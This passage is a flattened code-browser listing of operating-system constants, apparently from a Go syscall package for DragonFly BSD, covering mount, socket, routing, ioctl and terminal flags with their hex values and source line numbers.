(line 988) | MNT_NOEXEC = 0x4 constant MNT_NOSUID (line 989) | MNT_NOSUID = 0x8 constant MNT_NOSYMFOLLOW (line 990) | MNT_NOSYMFOLLOW = 0x400000 constant MNT_NOWAIT (line 991) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 992) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 993) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 994) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 995) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 996) | MNT_SOFTDEP = 0x200000 constant MNT_SUIDDIR (line 997) | MNT_SUIDDIR = 0x100000 constant MNT_SYNCHRONOUS (line 998) | MNT_SYNCHRONOUS = 0x2 constant MNT_TRIM (line 999) | MNT_TRIM = 0x1000000 constant MNT_UPDATE (line 1000) | MNT_UPDATE = 0x10000 constant MNT_USER (line 1001) | MNT_USER = 0x8000 constant MNT_VISFLAGMASK (line 1002) | MNT_VISFLAGMASK = 0xf1f0ffff constant MNT_WAIT (line 1003) | MNT_WAIT = 0x1 constant MSG_CMSG_CLOEXEC (line 1004) | MSG_CMSG_CLOEXEC = 0x1000 constant MSG_CTRUNC (line 1005) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1006) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1007) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1008) | MSG_EOF = 0x100 constant MSG_EOR (line 1009) | MSG_EOR = 0x8 constant MSG_FBLOCKING (line 1010) | MSG_FBLOCKING = 0x10000 constant MSG_FMASK (line 1011) | MSG_FMASK = 0xffff0000 constant MSG_FNONBLOCKING (line 1012) | MSG_FNONBLOCKING = 0x20000 constant MSG_NOSIGNAL (line 1013) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1014) | MSG_OOB = 0x1 constant MSG_PEEK (line 1015) | MSG_PEEK = 0x2 constant MSG_SYNC (line 1016) | MSG_SYNC = 0x800 constant MSG_TRUNC (line 1017) | MSG_TRUNC = 0x10 constant MSG_UNUSED09 (line 1018) | MSG_UNUSED09 = 0x200 constant MSG_WAITALL (line 1019) | MSG_WAITALL = 0x40 constant MS_ASYNC (line 1020) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1021) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1022) | MS_SYNC = 0x0 constant NAME_MAX (line 1023) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1024) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1025) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1026) | NET_RT_IFLIST = 0x3 constant NET_RT_MAXID (line 1027) | NET_RT_MAXID = 0x4 constant NFDBITS (line 1028) | NFDBITS = 0x40 constant NOFLSH (line 1029) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1030) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1031) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1032) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1033) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1034) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1035) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1036) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1037) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1038) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1039) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1040) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1041) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1042) | NOTE_FFOR = 0x80000000 constant NOTE_FORK (line 1043) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1044) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1045) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1046) | NOTE_OOB = 0x2 constant NOTE_PCTRLMASK (line 1047) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1048) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1049) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1050) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1051) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1052) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1053) | NOTE_TRIGGER = 0x1000000 constant NOTE_WRITE (line 1054) | NOTE_WRITE = 0x2 constant OCRNL (line 1055) | OCRNL = 0x10 constant ONLCR (line 1056) | ONLCR = 0x2 constant ONLRET (line 1057) | ONLRET = 0x40 constant ONOCR (line 1058) | ONOCR = 0x20 constant ONOEOT (line 1059) | ONOEOT = 0x8 constant OPOST (line 1060) | OPOST = 0x1 constant OXTABS (line 1061) | OXTABS = 0x4 constant O_ACCMODE (line 1062) | O_ACCMODE = 0x3 constant O_APPEND (line 1063) | O_APPEND = 0x8 constant O_ASYNC (line 1064) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1065) | O_CLOEXEC = 0x20000 constant O_CREAT (line 1066) | O_CREAT = 0x200 constant O_DIRECT (line 1067) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 1068) | O_DIRECTORY = 0x8000000 constant O_EXCL (line 1069) | O_EXCL = 0x800 constant O_EXLOCK (line 1070) | O_EXLOCK = 0x20 constant O_FAPPEND (line 1071) | O_FAPPEND = 0x100000 constant O_FASYNCWRITE (line 1072) | O_FASYNCWRITE = 0x800000 constant O_FBLOCKING (line 1073) | O_FBLOCKING = 0x40000 constant O_FMASK (line 1074) | O_FMASK = 0xfc0000 constant O_FNONBLOCKING (line 1075) | O_FNONBLOCKING = 0x80000 constant O_FOFFSET (line 1076) | O_FOFFSET = 0x200000 constant O_FSYNC (line 1077) | O_FSYNC = 0x80 constant O_FSYNCWRITE (line 1078) | O_FSYNCWRITE = 0x400000 constant O_NDELAY (line 1079) | O_NDELAY = 0x4 constant O_NOCTTY (line 1080) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1081) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1082) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1083) | O_RDONLY = 0x0 constant O_RDWR (line 1084) | O_RDWR = 0x2 constant O_SHLOCK (line 1085) | O_SHLOCK = 0x10 constant O_SYNC (line 1086) | O_SYNC = 0x80 constant O_TRUNC (line 1087) | O_TRUNC = 0x400 constant O_WRONLY (line 1088) | O_WRONLY = 0x1 constant PARENB (line 1089) | PARENB = 0x1000 constant PARMRK (line 1090) | PARMRK = 0x8 constant PARODD (line 1091) | PARODD = 0x2000 constant PENDIN (line 1092) | PENDIN = 0x20000000 constant PRIO_PGRP (line 1093) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1094) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1095) | PRIO_USER = 0x2 constant PROT_EXEC (line 1096) | PROT_EXEC = 0x4 constant PROT_NONE (line 1097) | PROT_NONE = 0x0 constant PROT_READ (line 1098) | PROT_READ = 0x1 constant PROT_WRITE (line 1099) | PROT_WRITE = 0x2 constant RLIMIT_AS (line 1100) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1101) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1102) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1103) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1104) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1105) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1106) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1107) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1108) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1109) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1110) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1111) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1112) | RTAX_BRD = 0x7 constant RTAX_DST (line 1113) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1114) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1115) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1116) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1117) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1118) | RTAX_MAX = 0xb constant RTAX_MPLS1 (line 1119) | RTAX_MPLS1 = 0x8 constant RTAX_MPLS2 (line 1120) | RTAX_MPLS2 = 0x9 constant RTAX_MPLS3 (line 1121) | RTAX_MPLS3 = 0xa constant RTAX_NETMASK (line 1122) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1123) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1124) | RTA_BRD = 0x80 constant RTA_DST (line 1125) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1126) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1127) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1128) | RTA_IFA = 0x20 constant RTA_IFP (line 1129) | RTA_IFP = 0x10 constant RTA_MPLS1 (line 1130) | RTA_MPLS1 = 0x100 constant RTA_MPLS2 (line 1131) | RTA_MPLS2 = 0x200 constant RTA_MPLS3 (line 1132) | RTA_MPLS3 = 0x400 constant RTA_NETMASK (line 1133) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1134) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1135) | RTF_BROADCAST = 0x400000 constant RTF_CLONING (line 1136) | RTF_CLONING = 0x100 constant RTF_DONE (line 1137) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1138) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 1139) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1140) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1141) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1142) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1143) | RTF_MODIFIED = 0x20 constant RTF_MPLSOPS (line 1144) | RTF_MPLSOPS = 0x1000000 constant RTF_MULTICAST (line 1145) | RTF_MULTICAST = 0x800000 constant RTF_PINNED (line 1146) | RTF_PINNED = 0x100000 constant RTF_PRCLONING (line 1147) | RTF_PRCLONING = 0x10000 constant RTF_PROTO1 (line 1148) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1149) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1150) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 1151) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1152) | RTF_STATIC = 0x800 constant RTF_UP (line 1153) | RTF_UP = 0x1 constant RTF_WASCLONED (line 1154) | RTF_WASCLONED = 0x20000 constant RTF_XRESOLVE (line 1155) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1156) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1157) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1158) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1159) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1160) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1161) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1162) | RTM_IEEE80211 = 0x12 constant RTM_IFANNOUNCE (line 1163) | RTM_IFANNOUNCE = 0x11 constant RTM_IFINFO (line 1164) | RTM_IFINFO = 0xe constant RTM_LOCK (line 1165) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1166) | RTM_LOSING = 0x5 constant RTM_MISS (line 1167) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1168) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1169) | RTM_NEWMADDR = 0xf constant RTM_REDIRECT (line 1170) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1171) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1172) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1173) | RTM_VERSION = 0x7 constant RTV_EXPIRE (line 1174) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1175) | RTV_HOPCOUNT = 0x2 constant RTV_IWCAPSEGS (line 1176) | RTV_IWCAPSEGS = 0x400 constant RTV_IWMAXSEGS (line 1177) | RTV_IWMAXSEGS = 0x200 constant RTV_MSL (line 1178) | RTV_MSL = 0x100 constant RTV_MTU (line 1179) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1180) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1181) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1182) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1183) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1184) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 1185) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1186) | RUSAGE_SELF = 0x0 constant SCM_CREDS (line 1187) | SCM_CREDS = 0x3 constant SCM_RIGHTS (line 1188) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1189) | SCM_TIMESTAMP = 0x2 constant SHUT_RD (line 1190) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1191) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1192) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1193) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1194) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1195) | SIOCAIFGROUP = 0x80286987 constant SIOCALIFADDR (line 1196) | SIOCALIFADDR = 0x8118691b constant SIOCATMARK (line 1197) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1198) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1199) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1200) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPHYADDR (line 1201) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDLIFADDR (line 1202) | SIOCDLIFADDR = 0x8118691d constant SIOCGDRVSPEC (line 1203) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETSGCNT (line 1204) | SIOCGETSGCNT = 0xc0207210 constant SIOCGETVIFCNT (line 1205) | SIOCGETVIFCNT = 0xc028720f constant SIOCGHIWAT (line 1206) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 1207) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALIAS (line 1208) | SIOCGIFALIAS = 0xc0406929 constant SIOCGIFBRDADDR (line 1209) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1210) | SIOCGIFCAP = 0xc020691f constant SIOCGIFCONF (line 1211) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDATA (line 1212) | SIOCGIFDATA = 0xc0206926 constant SIOCGIFDSTADDR (line 1213) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1214) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGENERIC (line 1215) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGMEMB (line 1216) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1217) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFINDEX (line 1218) | SIOCGIFINDEX = 0xc0206920 constant SIOCGIFMEDIA (line 1219) | SIOCGIFMEDIA = 0xc0306938 constant SIOCGIFMETRIC (line 1220) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1221) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1222) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1223) | SIOCGIFPDSTADDR = 0xc0206948 constant SIOCGIFPHYS (line 1224) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPOLLCPU (line 1225) | SIOCGIFPOLLCPU = 0xc020697e constant SIOCGIFPSRCADDR (line 1226) | SIOCGIFPSRCADDR = 0xc0206947 constant SIOCGIFSTATUS (line 1227) | SIOCGIFSTATUS = 0xc331693b constant SIOCGIFTSOLEN (line 1228) | SIOCGIFTSOLEN = 0xc0206980 constant SIOCGLIFADDR (line 1229) | SIOCGLIFADDR = 0xc118691c constant SIOCGLIFPHYADDR (line 1230) | SIOCGLIFPHYADDR = 0xc118694b constant SIOCGLOWAT (line 1231) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1232) | SIOCGPGRP = 0x40047309 constant SIOCGPRIVATE_0 (line 1233) | SIOCGPRIVATE_0 = 0xc0206950 constant SIOCGPRIVATE_1 (line 1234) | SIOCGPRIVATE_1 = 0xc0206951 constant SIOCIFCREATE (line 1235) | SIOCIFCREATE = 0xc020697a constant SIOCIFCREATE2 (line 1236) | SIOCIFCREATE2 = 0xc020697c constant SIOCIFDESTROY (line 1237) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1238) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSDRVSPEC (line 1239) | SIOCSDRVSPEC = 0x8028697b constant SIOCSHIWAT (line 1240) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1241) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1242) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1243) | SIOCSIFCAP = 0x8020691e constant SIOCSIFDSTADDR (line 1244) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1245) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1246) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1247) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMEDIA (line 1248) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1249) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1250) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNAME (line 1251) | SIOCSIFNAME = 0x80206928 constant SIOCSIFNETMASK (line 1252) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1253) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSIFPHYS (line 1254) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFPOLLCPU (line 1255) | SIOCSIFPOLLCPU = 0x8020697d constant SIOCSIFTSOLEN (line 1256) | SIOCSIFTSOLEN = 0x8020697f constant SIOCSLIFPHYADDR (line 1257) | SIOCSLIFPHYADDR = 0x8118694a constant SIOCSLOWAT (line 1258) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1259) | SIOCSPGRP = 0x80047308 constant SOCK_CLOEXEC (line 1260) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1261) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1262) | SOCK_MAXADDRLEN = 0xff constant SOCK_NONBLOCK (line 1263) | SOCK_NONBLOCK = 0x20000000 constant SOCK_RAW (line 1264) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1265) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1266) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1267) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1268) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1269) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1270) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1271) | SO_ACCEPTFILTER = 0x1000 constant SO_BROADCAST (line 1272) | SO_BROADCAST = 0x20 constant SO_CPUHINT (line 1273) | SO_CPUHINT = 0x1030 constant SO_DEBUG (line 1274) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 1275) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1276) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1277) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1278) | SO_LINGER = 0x80 constant SO_NOSIGPIPE (line 1279) | SO_NOSIGPIPE = 0x800 constant SO_OOBINLINE (line 1280) | SO_OOBINLINE = 0x100 constant SO_RCVBUF (line 1281) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1282) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1283) | SO_RCVTIMEO = 0x1006 constant SO_RERROR (line 1284) | SO_RERROR = 0x2000 constant SO_REUSEADDR (line 1285) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1286) | SO_REUSEPORT = 0x200 constant SO_SNDBUF (line 1287) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1288) | SO_SNDLOWAT = 0x1003 constant SO_SNDSPACE (line 1289) | SO_SNDSPACE = 0x100a constant SO_SNDTIMEO (line 1290) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1291) | SO_TIMESTAMP = 0x400 constant SO_TYPE (line 1292) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1293) | SO_USELOOPBACK = 0x40 constant S_BLKSIZE (line 1294) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1295) | S_IEXEC = 0x40 constant S_IFBLK (line 1296) | S_IFBLK = 0x6000 constant S_IFCHR (line 1297) | S_IFCHR = 0x2000 constant S_IFDB (line 1298) | S_IFDB = 0x9000 constant S_IFDIR (line 1299) | S_IFDIR = 0x4000 constant S_IFIFO (line 1300) | S_IFIFO = 0x1000 constant S_IFLNK (line 1301) | S_IFLNK = 0xa000 constant S_IFMT (line 1302) | S_IFMT = 0xf000 constant S_IFREG (line 1303) | S_IFREG = 0x8000 constant S_IFSOCK (line 1304) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1305) | S_IFWHT = 0xe000 constant S_IREAD (line 1306) | S_IREAD = 0x100 constant S_IRGRP (line 1307) | S_IRGRP = 0x20 constant S_IROTH (line 1308) | S_IROTH = 0x4 constant S_IRUSR (line 1309) | S_IRUSR = 0x100 constant S_IRWXG (line 1310) | S_IRWXG = 0x38 constant S_IRWXO (line 1311) | S_IRWXO = 0x7 constant S_IRWXU (line 1312) | S_IRWXU = 0x1c0 constant S_ISGID (line 1313) | S_ISGID = 0x400 constant S_ISTXT (line 1314) | S_ISTXT = 0x200 constant S_ISUID (line 1315) | S_ISUID = 0x800 constant S_ISVTX (line 1316) | S_ISVTX = 0x200 constant S_IWGRP (line 1317) | S_IWGRP = 0x10 constant S_IWOTH (line 1318) | S_IWOTH = 0x2 constant S_IWRITE (line 1319) | S_IWRITE = 0x80 constant S_IWUSR (line 1320) | S_IWUSR = 0x80 constant S_IXGRP (line 1321) | S_IXGRP = 0x8 constant S_IXOTH (line 1322) | S_IXOTH = 0x1 constant S_IXUSR (line 1323) | S_IXUSR = 0x40 constant TAB0 (line 1324) | TAB0 = 0x0 constant TAB3 (line 1325) | TAB3 = 0x4 constant TABDLY (line 1326) | TABDLY = 0x4 constant TCIFLUSH (line 1327) | TCIFLUSH = 0x1 constant TCIOFF (line 1328) | TCIOFF = 0x3 constant TCIOFLUSH (line 1329) | TCIOFLUSH = 0x3 constant TCION (line 1330) | TCION = 0x4 constant TCOFLUSH (line 1331) | TCOFLUSH = 0x2 constant TCOOFF (line 1332) | TCOOFF = 0x1 constant TCOON (line 1333) | TCOON = 0x2 constant TCP_FASTKEEP (line 1334) | TCP_FASTKEEP = 0x80 constant TCP_KEEPCNT (line 1335) | TCP_KEEPCNT = 0x400 constant TCP_KEEPIDLE (line 1336) | TCP_KEEPIDLE = 0x100 constant TCP_KEEPINIT (line 1337) | TCP_KEEPINIT = 0x20 constant TCP_KEEPINTVL (line 1338) | TCP_KEEPINTVL = 0x200 constant TCP_MAXBURST (line 1339) | TCP_MAXBURST = 0x4 constant TCP_MAXHLEN (line 1340) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1341) | TCP_MAXOLEN = 0x28 constant TCP_MAXSEG (line 1342) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1343) | TCP_MAXWIN = 0xffff constant TCP_MAX_WINSHIFT (line 1344) | TCP_MAX_WINSHIFT = 0xe constant TCP_MINMSS (line 1345) | TCP_MINMSS = 0x100 constant TCP_MIN_WINSHIFT (line 1346) | TCP_MIN_WINSHIFT = 0x5 constant TCP_MSS (line 1347) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1348) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1349) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1350) | TCP_NOPUSH = 0x4 constant TCP_SIGNATURE_ENABLE (line 1351) | TCP_SIGNATURE_ENABLE = 0x10 constant TCSAFLUSH (line 1352) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1353) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1354) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1355) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1356) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1357) | TIOCCONS = 0x80047462 constant TIOCDCDTIMESTAMP (line 1358) | TIOCDCDTIMESTAMP = 0x40107458 constant TIOCDRAIN (line 1359) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1360) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1361) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1362) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1363) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1364) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1365) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1366) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1367) | TIOCGSID = 0x40047463 constant TIOCGWINSZ (line 1368) | TIOCGWINSZ = 0x40087468 constant TIOCISPTMASTER (line 1369) | TIOCISPTMASTER = 0x20007455 constant TIOCMBIC (line 1370) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1371) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1372) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1373) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1374) | TIOCMODG = 0x40047403 constant TIOCMODS (line 1375) | TIOCMODS = 0x80047404 constant TIOCMSDTRWAIT (line 1376) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1377) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1378) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1379) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1380) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1381) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1382) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1383) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1384) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1385) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1386) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1387) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1388) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1389) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1390) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1391) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1392) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1393) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1394) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1395) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1396) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1397) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1398) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1399) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1400) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1401) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1402) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1403) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1404) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1405) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1406) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1407) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1408) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1409) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1410) | TIOCSIG = 0x2000745f constant TIOCSPGRP (line 1411) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1412) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1413) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1414) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1415) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1416) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1417) | TIOCTIMESTAMP = 0x40107459 constant TIOCUCNTL (line 1418) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1419) | TOSTOP = 0x400000 constant UTIME_NOW (line 1420) | UTIME_NOW = -0x1 constant UTIME_OMIT (line 1421) | UTIME_OMIT = -0x2 constant VCHECKPT (line 1422) 